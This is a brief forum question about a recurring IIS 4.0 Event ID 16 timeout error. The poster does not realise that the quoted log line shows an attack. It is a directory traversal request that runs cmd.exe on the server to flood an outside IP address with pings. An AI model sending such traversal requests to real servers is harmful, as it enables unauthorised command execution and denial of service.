IIS 4.0 Event ID 16

Has anyone seen the following error in Event Viewer and can you tell me what is causing the problem. It doesn’t seem to appear everyday, but does show up on a regular basis. The error text follows:

The script started from the URL ‘/scripts/..%5c..%5cwinnt/system32/cmd.exe’ with parameters ‘/c+ping+-n+11500+-l+64500+-w+409+65.161.40.42’ has not responded within the configured timeout period. The HTTP server is terminating the script.
